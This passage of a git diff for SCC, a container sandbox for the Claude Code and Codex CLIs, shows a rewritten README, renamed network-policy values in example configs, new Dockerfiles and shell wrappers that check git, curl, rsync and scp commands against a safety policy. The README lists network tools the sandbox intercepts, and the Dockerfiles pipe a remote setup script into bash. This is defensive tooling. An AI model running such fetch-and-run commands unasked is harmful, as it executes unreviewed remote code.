check`, `uv run mypy src/scc_cli`, `uv run pytest`, plus the safety-net plugin test suite when that package is touched. + +## Assumptions And Defaults +- No active users means no long-term backward compatibility burden is accepted in core. One migration pass is cheaper and cleaner than carrying aliases forever. +- Provider-core destination sets are automatic and minimal for the selected provider only. GitHub, npm, PyPI, and other dev destinations are never implicitly enabled by choosing Claude or Codex. +- Open Agent Skills are the only intended shared portability surface. Plugins, hooks, rules, and marketplaces remain provider-native adapter integrations. +- Codex rules and plugin features are optional provider UX integrations, not the hard safety boundary. The hard boundary is SCC-owned runtime wrappers plus network topology and proxy enforcement. +- V1 network enforcement is HTTP/HTTPS-focused only, with no TLS interception and no generic arbitrary TCP/UDP policy surface yet. +- The first release target is plain OCI portability with SCC-owned images and no Docker Desktop dependency. Podman follows on the same contracts once the Claude/Codex vertical slice is stable. diff --git a/README.md b/README.md index 2ce8adc..3348cda 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -

SCC - Sandboxed Claude CLI

+

SCC — Sandboxed Coding CLI

PyPI @@ -9,436 +9,189 @@

Quick Start · - Commands · + Why SCC · + Commands · + Read Next · Documentation · - Configuration · Architecture

- 📚 Full Documentation: scc-cli.dev + Full documentation: scc-cli.dev

--- -Run [Claude Code](https://docs.anthropic.com/en/docs/claude-code) (Anthropic's AI coding CLI) in Docker sandboxes with organization-managed team profiles and git worktree support. +SCC is a governed runtime for AI coding agents. It runs [Claude Code](https://docs.anthropic.com/en/docs/claude-code) and [Codex](https://openai.com/index/introducing-codex/) inside OCI-compatible containers with provider-aware onboarding, team-managed configuration, runtime safety, network controls, and git worktree support. -SCC isolates AI execution in containers, enforces branch safety, and prevents destructive git commands. Organizations distribute plugins through a central config—developers get standardized setups without manual configuration. +SCC is not a new agent. It gives organizations an operating model for existing coding CLIs: one org config, delegated team ownership, repeatable developer onboarding, and a safer runtime that is easier to review and roll out across a company. -> **Plugin Marketplace:** Extend Claude with the [official plugin marketplace](https://github.com/CCimen/sandboxed-code-plugins). Start with [**scc-safety-net**](https://scc-cli.dev/plugins/safety-net/) to block destructive git commands like `push --force`. +> The optional [scc-safety-net](https://scc-cli.dev/plugins/safety-net/) plugin adds extra agent-native git protection where supported. Today it is Claude-focused. SCC's built-in safety engine already protects both Claude and Codex inside the sandbox. -## 30-Second Guide +## Why Teams Use SCC -**Requires:** Python 3.10+, Docker Desktop 4.50+, Git 2.30+ +Teams use SCC when they want AI coding agents to feel operationally manageable instead of ad hoc. -```bash -uv tool install scc-cli # Install (recommended) -scc setup # Configure (paste your org URL, pick your team) -cd ~/project && scc # Auto-detect workspace and launch (or scc start ~/project) -``` - -> **Alternative:** `pip install scc-cli` works if you don't have [uv](https://docs.astral.sh/uv/). - -Run `scc doctor` to verify your environment or troubleshoot issues. - -### Smart Start Flow - -When you run `scc` or `scc start`: -- **Auto-detects workspace** from git repository root or `.scc.yaml` location -- **Shows Quick Resume** if you have recent sessions for this workspace -- **Prints brief context** (workspace root, entry directory, team) before launching -- **Applies personal profile** (if saved) after team config, before workspace overrides -- **Bypass mode enabled**: Permission prompts are skipped by default since the Docker sandbox already provides isolation. This does not prevent access to files inside the mounted workspace. Press `Shift+Tab` inside Claude to toggle permissions back on if needed -- **Safety guard**: Won't auto-launch from suspicious directories (home, `/tmp`). Explicit paths like `scc start ~/` prompt for confirmation - -**Keyboard shortcuts in dashboard:** -- `↑↓` — Navigate list -- `Enter` — Open action menu (containers/sessions/worktrees) -- `Tab` — Switch between tabs -- `n` — Start new session -- `t` — Switch team -- `p` — Profile quick menu (save/apply/diff) -- `r` — Refresh -- `s` — Settings & maintenance -- `?` — Help -- `q` — Quit - ---- - -### Find Your Path - -| You are... | Start here | -|------------|------------| -| **Developer** joining a team | [Developer Onboarding](#developer-onboarding) — what you get automatically | -| **Team Lead** setting up your team | [Team Setup](#team-setup) — manage plugins in your own repo | -| **Org Admin** configuring security | [Organization Setup](#organization-setup) — control what's allowed org-wide | -| Exploring **plugins** | [Plugin Marketplace](https://scc-cli.dev/plugins/marketplace/) — official plugins & safety tools | - ---- +- **Roll out one governed setup**: define org defaults once, then let team leads maintain team-level config within those boundaries. +- **Support more than one agent**: allow Claude, Codex, or both without rebuilding your workflow around a single vendor. +- **Onboard developers faster**: new developers run `scc setup` and get the approved package instead of manually installing plugins, hooks, MCP servers, and local rules. +- **Isolate the runtime**: run the agent in a container that sees the workspace you mounted, not your whole machine. +- **Control the network path**: keep egress open, force HTTP/HTTPS through a proxy sidecar, or lock the container down completely. +- **Apply runtime safety by default**: block destructive git commands and intercept explicit network tools inside the sandbox. +- **Keep daily workflows practical**: protected-branch prompts, session resume, dashboards, and worktree-based feature work are built in. -### Developer Onboarding +## Quick Start -**New to a team?** After running `scc setup` and `scc start`, you get: - -- **Your team's approved plugins and MCP servers** — pre-configured and ready -- **Organization security policies** — applied automatically, no action needed -- **Command guardrails** — block destructive git commands like `push --force` (when scc-safety-net plugin is enabled) -- **Isolated git worktrees** — your main branch stays clean while Claude experiments -- **Personal profiles (optional)** — save your own plugin/MCP preferences per project - -**What you never need to do:** -- Edit config files manually -- Download or configure plugins -- Worry about security settings - -Your org admin and team lead handle the configuration. You just code. - ---- - -### Who Controls What - -| Setting | Org Admin | Team Lead | Developer | -|---------|:---------:|:---------:|:---------:| -| Block dangerous plugins/servers | ✅ **Sets** | ❌ Cannot override | ❌ Cannot override | -| Default plugins for all teams | ✅ **Sets** | — | — | -| Team-specific plugins | ✅ Approves | ✅ **Chooses** | — | -| Project-local config (.scc.yaml) | ✅ Can restrict | ✅ Can restrict | ✅ **Extends** | -| Personal profiles (local) | ✅ Governed by security blocks | ✅ Governed by delegation | ✅ **Chooses** | -| Safety-net policy (block/warn) | ✅ **Sets** | ❌ Cannot override | ❌ Cannot override | - -Organization security blocks cannot be overridden by teams or developers. - -*"Approves" = teams can only select from org-allowed marketplaces; blocks always apply. "Extends" = can add plugins/settings, cannot remove org defaults.* - -### Enforcement Scope (v1) - -- SCC enforces org-managed plugins and MCP servers at runtime. -- MCP servers in repo `.mcp.json` or plugin bundles are outside SCC enforcement scope (block the plugin to restrict). -- `network_policy` is partially enforced (proxy env injection + MCP suppression under isolated), not a full egress firewall. -- `session.auto_resume` is advisory only in v1. - ---- - -### Organization Setup - -Org admins create a single JSON config that controls security for all teams: - -```json -{ - "schema_version": "1.0.0", - "organization": { "name": "Acme Corp", "id": "acme" }, - "marketplaces": { - "sandboxed-code-official": { - "source": "github", - "owner": "CCimen", - "repo": "sandboxed-code-plugins" - } - }, - "security": { - "blocked_plugins": ["*malicious*"], - "blocked_mcp_servers": ["*.untrusted.com"], - "safety_net": { "action": "block" } - }, - "defaults": { - "allowed_plugins": ["*"], - "network_policy": "unrestricted" - }, - "profiles": { - "backend": { "additional_plugins": ["scc-safety-net@sandboxed-code-official"] }, - "frontend": { "additional_plugins": ["scc-safety-net@sandboxed-code-official"] } - } -} -``` - -Host this anywhere: GitHub, GitLab, S3, or any HTTPS URL. Private repos work with token auth. - -See [examples/](examples/) for complete org configs and [Governance](https://scc-cli.dev/architecture/governance-model/) for delegation rules. - ---- - -### Team Setup - -Teams can manage their plugins **two ways**: - -**Option A: Inline (simple)** — Team config lives in the org config file. -```json -"profiles": { - "backend": { - "additional_plugins": ["scc-safety-net@sandboxed-code-official"] - } -} -``` - -**Option B: Team Repo (GitOps)** — Team maintains their own config repo. -```json -"profiles": { - "backend": { - "config_source": { - "source": "github", - "owner": "acme", - "repo": "backend-team-scc-config" - } - } -} -``` - -With Option B, team leads can update plugins via PRs to their own repo—no org admin approval needed for allowed additions. - -**Config precedence:** Org defaults → Team profile → Project `.scc.yaml` (additive merge; blocks apply after merge). - ---- - -### Personal Profiles - -Want your own plugins or MCP servers without committing anything? Personal profiles are per‑project, stored outside the repo, and auto‑applied on `scc start`. - -If you install plugins inside the container and they only show up in sandbox settings, `scc profile save` and `scc profile status` will detect them and offer to import them into `.claude/settings.local.json` before saving. +**Requires:** Python 3.10+, Git 2.30+, and a Docker-compatible container runtime such as [Docker Engine](https://docs.docker.com/engine/), [OrbStack](https://orbstack.dev/), [Colima](https://github.com/abiosoft/colima), or [Docker Desktop](https://www.docker.com/products/docker-desktop/). Docker Desktop is supported, but not required. ```bash -# Save current workspace preferences -scc profile save - -# Apply or preview -scc profile apply -scc profile apply --preview - -# Check status/drift -scc profile status -``` - -**TUI Integration:** Press `p` in the dashboard or go to **Settings → Profiles** for visual profile management: -- Save/Apply/Diff profiles without CLI commands -- **Sync profiles** overlay for export/import to a local folder -- Import preview shows what will change before applying - -**Sync across machines:** - -```bash -# Via TUI: Settings → Profiles → Sync profiles -# Or via CLI with git operations: -scc profile export --repo ~/dotfiles/scc-profiles --commit --push -scc profile sync --repo ~/dotfiles/scc-profiles --pull --commit --push +uv tool install scc-cli +scc setup +cd ~/project && scc ``` -> **Note:** TUI sync writes files locally only (no git). Use CLI flags `--commit --push` for git operations. - ---- - -## Commands - -### Essential Commands - -| Command | Description | -|---------|-------------| -| `scc` | Smart start: auto-detect workspace, show Quick Resume, or launch | -| `scc setup` | Configure organization connection | -| `scc doctor` | Check system health and diagnose issues | -| `scc stop` | Stop running sandbox(es) | - -### Session & Team - -| Command | Description | -|---------|-------------| -| `scc start --resume` | Resume most recent session | -| `scc start --select` | Pick from recent sessions | -| `scc team switch` | Switch to a different team profile | -| `scc sessions` | List recent sessions | - -### Worktrees +What `scc setup` does: -| Command | Description | -|---------|-------------| -| `scc worktree create ` | Create git worktree for parallel development | -| `scc worktree enter [target]` | Enter worktree in subshell (no shell config needed) | -| `scc worktree list -v` | List worktrees with git status | +- connects your org config or enables standalone mode +- connects Claude, Codex, or both +- stores your provider preference: `ask`, `claude`, or `codex` -### Personal Profiles +What first launch does: -| Command | Description | -|---------|-------------| -| `scc profile save` | Save current workspace settings as a personal profile | -| `scc profile apply` | Apply profile to current workspace | -| `scc profile diff` | Show diff between profile and workspace | -| `scc profile status` | Show whether a profile exists and if drift is detected | -| `scc profile export --repo PATH` | Export profiles to a local repo | -| `scc profile import --repo PATH` | Import profiles from a local repo | -| `scc profile sync --repo PATH` | Pull/import + export + optional commit/push | +- resolves which provider to use +- checks readiness for auth and images +- builds the provider image if needed +- bootstraps provider auth if needed +- starts the agent inside a sandboxed container -### Maintenance - -| Command | Description | -|---------|-------------| -| `scc reset` | Interactive maintenance hub (cache, sessions, config) | -| `scc reset --cache` | Clear cache files | -| `scc reset --sessions` | Prune old sessions (keeps recent 20) | -| `scc reset --all` | Factory reset (removes all SCC data) | -| `scc config paths` | Show file locations and sizes | -| `scc sessions prune` | Clean up old sessions | - -### Governance & Admin - -| Command | Description | -|---------|-------------| -| `scc config explain` | Show effective config with sources | -| `scc exceptions list` | View active exceptions | -| `scc audit plugins` | Audit installed plugins | -| `scc support bundle` | Generate support bundle for troubleshooting | -| `scc completion bash` | Generate shell completions (bash/zsh/fish) | - -Run `scc --help` for options. See **[CLI Reference](https://scc-cli.dev/reference/cli/overview/)** for the complete command list (40+ commands). - -### Git Worktrees - -**Primary method (no shell config needed):** +Useful first checks: ```bash -scc worktree enter feature-auth # Opens a subshell in the worktree -# Type 'exit' to return to your previous directory +scc doctor +scc doctor --provider codex ``` -**Power users:** Add this shell wrapper for seamless `cd` switching: +## How SCC Helps an Organization -```bash -# Add to ~/.bashrc or ~/.zshrc -wt() { - local p - p="$(scc worktree switch "$@")" || return $? - cd "$p" || return 1 -} -``` +SCC gives AI coding agents an organization-ready operating model. -**Usage examples (both methods):** +| Role | What SCC gives them | +|---|---| +| **Org admin / platform team** | One central config for allowed providers, network policy, plugin/MCP governance, and defaults | +| **Team lead** | Delegated control over team-specific setup within org-approved boundaries | +| **Developer** | A repeatable onboarding flow and a ready-to-use sandboxed environment instead of manual local setup | -```bash -scc worktree enter ^ # Enter main branch worktree -scc worktree enter - # Enter previous worktree (like cd -) -wt feature-auth # Switch with shell wrapper -wt scc/feature-x # Match by full branch name -``` +That combination is the main value: tighter control for the organization, less friction for the developer. -**Note:** Branch names with `/` are sanitized to `-` (e.g., `feature/auth` → `feature-auth`). +## What SCC Controls -**Status indicators in `list -v`:** +| Surface | What SCC does | +|---|---| +| Providers | Runs Claude Code and Codex through one provider-neutral launch path | +| Filesystem | Mounts the workspace into the sandbox instead of exposing your whole machine | +| Network | Supports `open`, `web-egress-enforced`, and `locked-down-web` | +| Safety | Blocks destructive git commands and checks explicit network tools inside the container | +| Team config | Applies org and team settings consistently across developers | +| Plugins and MCP | Governs what is allowed, blocked, or injected into the runtime | +| Sessions | Supports start, resume, stop, inspect, and prune flows | +| Git workflows | Supports protected-branch prompts and worktree-based feature work | -| Symbol | Meaning | -|--------|---------| -| `+N` | N staged files | -| `!N` | N modified files | -| `?N` | N untracked files | -| `.` | Clean worktree | -| `…` | Status timed out | +One important point: a container alone does **not** solve network risk. If you care about what an agent can reach, use SCC's network policies, not just a default container runtime. -**Cleanup stale entries:** +## Network and Safety -```bash -scc worktree prune -n # Dry-run: show what would be pruned -scc worktree prune # Actually prune stale entries -``` +SCC separates sandboxing from egress control on purpose. ---- +- `open`: unrestricted network access +- `web-egress-enforced`: the agent runs on an internal-only network and reaches HTTP/HTTPS through a Squid proxy sidecar with an ACL +- `locked-down-web`: the container runs with `--network=none` -## Configuration +The built-in safety engine is provider-neutral. It uses shell wrappers inside the image to evaluate commands before forwarding them to the real binary. In v1, the hard safety baseline focuses on destructive git commands and explicit network tools such as `curl`, `wget`, `ssh`, `scp`, `sftp`, and `rsync`. -### Setup Modes +Those runtime wrappers are defense-in-depth. They intercept risky commands inside the container, but the hard network boundary remains the runtime topology and proxy policy. -**Organization mode** (recommended): -```bash -scc setup -# Enter URL when prompted: https://gitlab.example.org/devops/scc-config.json -``` +## Common Commands -**Standalone mode** (no org config): ```bash -scc setup --standalone -``` - -### Project Config +# Start and resume +scc +scc start ~/project +scc start --provider codex ~/project +scc start --resume +scc start --select -Add `.scc.yaml` to your repository root for project-specific settings: +# Provider management +scc provider show +scc provider set ask +scc provider set claude +scc provider set codex -```yaml -additional_plugins: - - "project-linter@internal" +# Sessions and containers +scc sessions +scc list +scc stop +scc stop --all +scc prune -session: - timeout_hours: 4 -``` - -### File Locations +# Worktrees +scc worktree . create feature-auth +scc worktree . enter feature-auth -``` -~/.config/scc/config.json # Org URL, team, preferences -~/.cache/scc/ # Cache (safe to delete) -/.scc.yaml # Project-specific config +# Diagnostics +scc doctor +scc config explain +scc support safety-audit ``` -Run `scc config paths` to see all locations with sizes and permissions. +## Architecture at a Glance ---- - -## Troubleshooting +SCC has three main parts: -Run `scc doctor` to diagnose issues. +- **Control plane**: provider selection, governance, config inheritance, readiness checks, and audit planning +- **Runtime backend**: OCI container launch, images, web egress topology, and sandbox lifecycle +- **Provider adapters**: Claude and Codex auth, settings rendering, runtime spec, and provider-specific startup behavior -| Problem | Solution | -|---------|----------| -| Docker not reachable | Start Docker Desktop | -| Organization config fetch failed | Check URL and token | -| Plugin blocked | Check `scc config explain` for security blocks | +That split keeps the core provider-neutral while letting each provider keep its own native details. -See [Troubleshooting Guide](https://scc-cli.dev/troubleshooting/) for more solutions. +## Read This Next ---- +If you only want to get productive, start here: -## Documentation +- [Quick Start](https://scc-cli.dev/getting-started/quick-start/) +- [Core Concepts](https://scc-cli.dev/getting-started/core-concepts/) +- [Daily Workflow](https://scc-cli.dev/guides/developer/daily-workflow/) -Visit **[scc-cli.dev](https://scc-cli.dev)** for comprehensive documentation: +If you are evaluating SCC for a team or organization, read these next: -- [Getting Started](https://scc-cli.dev/getting-started/quick-start/) — installation and first steps -- [CLI Reference](https://scc-cli.dev/reference/cli/overview/) — complete command reference (40+ commands) -- [Architecture](https://scc-cli.dev/architecture/overview/) — system design, module structure -- [Governance](https://scc-cli.dev/architecture/governance-model/) — delegation model, security boundaries -- [Plugin Marketplace](https://scc-cli.dev/plugins/marketplace/) — plugin distribution and safety-net -- [Troubleshooting](https://scc-cli.dev/troubleshooting/) — common problems and solutions -- [Examples](https://scc-cli.dev/examples/) — ready-to-use organization config templates +- [Architecture Overview](https://scc-cli.dev/architecture/overview/) +- [Security Model](https://scc-cli.dev/architecture/security-model/) +- [Governance Model](https://scc-cli.dev/architecture/governance-model/) +- [Examples](https://scc-cli.dev/examples/) +- [Plugin Marketplace](https://scc-cli.dev/plugins/marketplace/) ---- +If you want command details: -## Automation & CI +- [CLI Reference](https://scc-cli.dev/reference/cli/overview/) +- [Troubleshooting](https://scc-cli.dev/troubleshooting/) -SCC supports non-interactive operation for CI/CD pipelines and scripting. +## Development ```bash -# CI pipeline example -scc start --non-interactive --team backend ~/project - -# Preview configuration as JSON -scc start --dry-run --json - -# Full automation mode -scc start --dry-run --json --non-interactive ~/project +uv sync +uv run pytest +uv run ruff check +uv run mypy src/scc_cli ``` -**Key flags:** -- `--non-interactive` — Fail fast instead of prompting -- `--json` — Machine-readable output with standardized envelope -- `--dry-run` — Preview configuration without launching - -**Exit codes:** 0 (success), 2 (usage error), 3 (config error), 4 (tool error), 5 (prerequisites), 6 (governance block), 130 (cancelled) - -See [CLI Reference → Exit Codes](https://scc-cli.dev/reference/cli/overview/#exit-codes) for complete documentation. +## Contributing ---- - -## Development +Issues, bug reports, docs fixes, and pull requests are welcome. -```bash -uv sync # Install dependencies -uv run pytest # Run tests -uv run ruff check # Run linter -``` +If you want to contribute: ---- +- open an issue for bugs or product gaps +- open a PR for focused fixes +- keep user-facing claims truthful to the actual runtime behavior ## License diff --git a/examples/01-quickstart-minimal.json b/examples/01-quickstart-minimal.json index a7c986a..475971b 100644 --- a/examples/01-quickstart-minimal.json +++ b/examples/01-quickstart-minimal.json @@ -12,7 +12,7 @@ }, "defaults": { "allowed_plugins": ["*"], - "network_policy": "unrestricted" + "network_policy": "open" }, "profiles": { "default": { diff --git a/examples/02-org-teams-delegation.json b/examples/02-org-teams-delegation.json index 8d9610e..020085f 100644 --- a/examples/02-org-teams-delegation.json +++ b/examples/02-org-teams-delegation.json @@ -23,7 +23,7 @@ "core-*", "shared-*" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true @@ -100,7 +100,7 @@ "url": "https://mcp.mermaid.ai/mcp" } ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "delegation": { "allow_project_overrides": true } diff --git a/examples/03-org-strict-security.json b/examples/03-org-strict-security.json index fda4007..2fb0d00 100644 --- a/examples/03-org-strict-security.json +++ b/examples/03-org-strict-security.json @@ -27,7 +27,7 @@ "allowed_mcp_servers": [ "https://mcp.internal.example.com/*" ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 8, "auto_resume": false @@ -61,7 +61,7 @@ }, "compliance": { "description": "Compliance team with restricted access", - "network_policy": "isolated" + "network_policy": "locked-down-web" } }, "stats": { diff --git a/examples/04-org-stdio-hardened.json b/examples/04-org-stdio-hardened.json index 6f0570e..97a1dcb 100644 --- a/examples/04-org-stdio-hardened.json +++ b/examples/04-org-stdio-hardened.json @@ -17,7 +17,7 @@ }, "defaults": { "allowed_plugins": ["*"], - "network_policy": "unrestricted" + "network_policy": "open" }, "delegation": { "teams": { diff --git a/examples/05-org-federated-teams.json b/examples/05-org-federated-teams.json index 495c0a2..1da8d37 100644 --- a/examples/05-org-federated-teams.json +++ b/examples/05-org-federated-teams.json @@ -23,7 +23,7 @@ "core-utils", "shared-linter@shared" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true diff --git a/examples/06-github-federated-skeleton.json b/examples/06-github-federated-skeleton.json index ab41676..bf0804d 100644 --- a/examples/06-github-federated-skeleton.json +++ b/examples/06-github-federated-skeleton.json @@ -20,7 +20,7 @@ "allowed_plugins": [ "core-utils" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true diff --git a/examples/07-hybrid-gitlab-github-skeleton.json b/examples/07-hybrid-gitlab-github-skeleton.json index 692a4ac..0f3fe6c 100644 --- a/examples/07-hybrid-gitlab-github-skeleton.json +++ b/examples/07-hybrid-gitlab-github-skeleton.json @@ -23,7 +23,7 @@ "core-utils", "standard-linter@public-shared" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true diff --git a/examples/08-sundsvall-kommun-org.json b/examples/08-sundsvall-kommun-org.json index 3651ace..ff7c087 100644 --- a/examples/08-sundsvall-kommun-org.json +++ b/examples/08-sundsvall-kommun-org.json @@ -24,7 +24,7 @@ "code-quality@sundsvall-shared", "git-workflow@sundsvall-shared" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 10, "auto_resume": true @@ -51,7 +51,7 @@ "java-analyzer@sundsvall-shared", "openapi-designer@sundsvall-shared" ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "delegation": { "allow_project_overrides": false } diff --git a/examples/09-org-safety-net-enabled.json b/examples/09-org-safety-net-enabled.json index 1c64081..ce0a62e 100644 --- a/examples/09-org-safety-net-enabled.json +++ b/examples/09-org-safety-net-enabled.json @@ -37,7 +37,7 @@ "enabled_plugins": [ "scc-safety-net@sandboxed-code-official" ], - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true diff --git a/examples/11-release-readiness-org.json b/examples/11-release-readiness-org.json index df5fd7e..68849bb 100644 --- a/examples/11-release-readiness-org.json +++ b/examples/11-release-readiness-org.json @@ -68,7 +68,7 @@ "sandboxed-code-official" ], "cache_ttl_hours": 24, - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 12, "auto_resume": true @@ -104,7 +104,7 @@ } } ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "delegation": { "allow_project_overrides": false } @@ -127,7 +127,7 @@ "url": "https://mcp.mermaid.ai/sse" } ], - "network_policy": "unrestricted", + "network_policy": "open", "delegation": { "allow_project_overrides": true } @@ -147,7 +147,7 @@ } } ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 10, "auto_resume": false @@ -169,7 +169,7 @@ "url": "https://mcp.internal.example.com/data" } ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 24, "auto_resume": true @@ -196,7 +196,7 @@ } } ], - "network_policy": "isolated", + "network_policy": "locked-down-web", "delegation": { "allow_project_overrides": false } @@ -213,7 +213,7 @@ "url": "https://mcp.internal.example.com/security" } ], - "network_policy": "isolated", + "network_policy": "locked-down-web", "delegation": { "allow_project_overrides": false } diff --git a/examples/99-complete-reference.json b/examples/99-complete-reference.json index 8d70c1f..5f7cf3f 100644 --- a/examples/99-complete-reference.json +++ b/examples/99-complete-reference.json @@ -82,7 +82,7 @@ "sandboxed-code-official" ], "cache_ttl_hours": 24, - "network_policy": "unrestricted", + "network_policy": "open", "session": { "timeout_hours": 12, "auto_resume": true @@ -128,7 +128,7 @@ "url": "https://www.shadcn.io/api/mcp" } ], - "network_policy": "corp-proxy-only", + "network_policy": "web-egress-enforced", "session": { "timeout_hours": 8, "auto_resume": false @@ -169,7 +169,7 @@ } } ], - "network_policy": "isolated" + "network_policy": "locked-down-web" }, "federated-team": { "description": "Federated team with external config source (team manages own config)", diff --git a/images/scc-agent-claude/Dockerfile b/images/scc-agent-claude/Dockerfile new file mode 100644 index 0000000..bf06911 --- /dev/null +++ b/images/scc-agent-claude/Dockerfile @@ -0,0 +1,30 @@ +# scc-agent-claude: Claude Code agent image built on scc-base. +# Installs the current Node.js LTS line and the Claude CLI globally. +FROM scc-base:latest + +# Default to the current active Node.js LTS line. +ARG NODE_MAJOR=24 + +# Switch to root for system-level installs +USER root + +# Install Node.js via NodeSource. +# Use a clean system PATH for this step so the bootstrap script does not pick +# up SCC's runtime safety wrappers from scc-base during image construction. +RUN export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" \ + && /usr/bin/curl -fsSL "https://deb.nodesource.com/setup_${NODE_MAJOR}.x" | bash - \ + && apt-get install -y --no-install-recommends nodejs \ + && rm -rf /var/lib/apt/lists/* + +# Install Claude CLI globally +RUN npm install -g @anthropic-ai/claude-code + +# Verify installation +RUN claude --version + +# Switch back to the non-root agent user +USER agent +WORKDIR /home/agent + +# The OCI adapter will exec claude explicitly; bash as default entrypoint +ENTRYPOINT ["/bin/bash"] diff --git a/images/scc-agent-codex/Dockerfile b/images/scc-agent-codex/Dockerfile new file mode 100644 index 0000000..e104eae --- /dev/null +++ b/images/scc-agent-codex/Dockerfile @@ -0,0 +1,38 @@ +# scc-agent-codex: OpenAI Codex CLI agent image built on scc-base. +# Installs the current Node.js LTS line and the Codex CLI globally. +FROM scc-base:latest + +# Default to the current active Node.js LTS line. +ARG NODE_MAJOR=24 + +# Pin the Codex CLI version for deterministic builds. +# Override at build time: docker build --build-arg CODEX_VERSION=0.1.2 ... +ARG CODEX_VERSION=latest + +# Switch to root for system-level installs +USER root + +# Install Node.js via NodeSource plus browser-auth/runtime helpers. +# Use a clean system PATH for this step so the bootstrap script does not pick +# up SCC's runtime safety wrappers from scc-base during image construction. +RUN export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" \ + && /usr/bin/curl -fsSL "https://deb.nodesource.com/setup_${NODE_MAJOR}.x" | bash - \ + && apt-get install -y --no-install-recommends nodejs bubblewrap socat \ + && rm -rf /var/lib/apt/lists/* + +# Install Codex CLI globally (version pinned via ARG) +RUN if [ "$CODEX_VERSION" = "latest" ]; then \ + npm install -g @openai/codex; \ + else \ + npm install -g @openai/codex@"$CODEX_VERSION"; \ + fi + +# Verify installation +RUN codex --version + +# Switch back to the non-root agent user +USER agent +WORKDIR /home/agent + +# The OCI adapter will exec codex explicitly; bash as default entrypoint +ENTRYPOINT ["/bin/bash"] diff --git a/images/scc-base/Dockerfile b/images/scc-base/Dockerfile new file mode 100644 index 0000000..b1c781a --- /dev/null +++ b/images/scc-base/Dockerfile @@ -0,0 +1,39 @@ +# scc-base: Foundation image for all SCC agent containers. +# Provides a non-root agent user, essential CLI tools, safety wrappers, +# and a clean HOME. +FROM ubuntu:22.04 + +# Avoid interactive prompts during package installation +ENV DEBIAN_FRONTEND=noninteractive + +RUN apt-get update \ + && apt-get install -y --no-install-recommends \ + git \ + curl \ + wget \ + openssh-client \ + rsync \ + python3 \ + ca-certificates \ + jq \ + && rm -rf /var/lib/apt/lists/* + +# Install the standalone safety evaluator and wrapper scripts +COPY wrappers/scc_safety_eval/ /usr/local/lib/scc/scc_safety_eval/ +COPY wrappers/bin/ /usr/local/lib/scc/bin/ +RUN chmod +x /usr/local/lib/scc/bin/* + +# Make the evaluator importable and wrappers first in PATH +ENV PYTHONPATH=/usr/local/lib/scc +ENV PATH="/usr/local/lib/scc/bin:$PATH" + +# Create agent user (uid 1000) with home directory +RUN useradd -m -u 1000 -s /bin/bash agent + +# Pre-create provider config directories owned by agent with strict permissions +RUN mkdir -p /home/agent/.claude /home/agent/.codex \ + && chmod 0700 /home/agent/.claude /home/agent/.codex \ + && chown agent:agent /home/agent/.claude /home/agent/.codex + +USER agent +WORKDIR /home/agent diff --git a/images/scc-base/wrappers/bin/curl b/images/scc-base/wrappers/bin/curl new file mode 100755 index 0000000..c28ebb2 --- /dev/null +++ b/images/scc-base/wrappers/bin/curl @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/curl + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/bin/git b/images/scc-base/wrappers/bin/git new file mode 100755 index 0000000..c8a99f4 --- /dev/null +++ b/images/scc-base/wrappers/bin/git @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/git + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/bin/rsync b/images/scc-base/wrappers/bin/rsync new file mode 100755 index 0000000..25fbb5b --- /dev/null +++ b/images/scc-base/wrappers/bin/rsync @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/rsync + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" "$@" diff --git a/images/scc-base/wrappers/bin/scp b/images/scc-base/wrappers/bin/scp new file mode 100755 index 0000000..98c1236 --- /dev/null +++ b/images/scc-base/wrappers/bin/scp @@ -0,0 +1,17 @@ +#!/bin/bash +set -euo pipefail + +# Absolute path to the real binary — prevents self-recursion +REAL_BIN=/usr/bin/scp + +# Evaluate the command against safety policy +# PYTHONPATH is set by the Dockerfile to /usr/local/lib/scc +verdict=$(python3 -m scc_safety_eval "$(basename "$0")" "$@" 2>&1) || { + rc=$? + if [ "$rc" -eq 2 ]; then + echo "$verdict" >&2 + exit 2 + fi +} + +exec "$REAL_BIN" 